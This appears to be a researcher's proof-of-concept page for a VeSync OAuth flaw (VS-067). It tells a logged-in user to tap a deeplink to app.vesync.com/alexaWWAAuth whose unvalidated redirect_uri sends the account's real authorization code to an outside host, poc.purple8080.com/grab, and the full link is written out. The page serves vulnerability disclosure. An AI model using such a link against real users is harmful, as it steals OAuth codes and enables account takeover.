VeSync OAuth redirect_uri PoC — VS-067

Security proof-of-concept (researcher-controlled origin poc.purple8080.com). It shows that app.vesync.com/alexaWWAAuth sends your account's OAuth authorization code to an attacker-chosen, unvalidated redirect_uri.

1) Log into the VeSync app on this device.   2) Tap:

Trigger VeSync Alexa authorization

You'll see the genuine "Connect to Alexa" screen. After you tap Allow, your real OAuth code is delivered here to poc.purple8080.com and shown on screen — proving the leak to an arbitrary origin.

Deeplink: https://app.vesync.com/alexaWWAAuth?redirect_uri=https%3A%2F%2Fpoc.purple8080.com%2Fgrab&state=vs067poc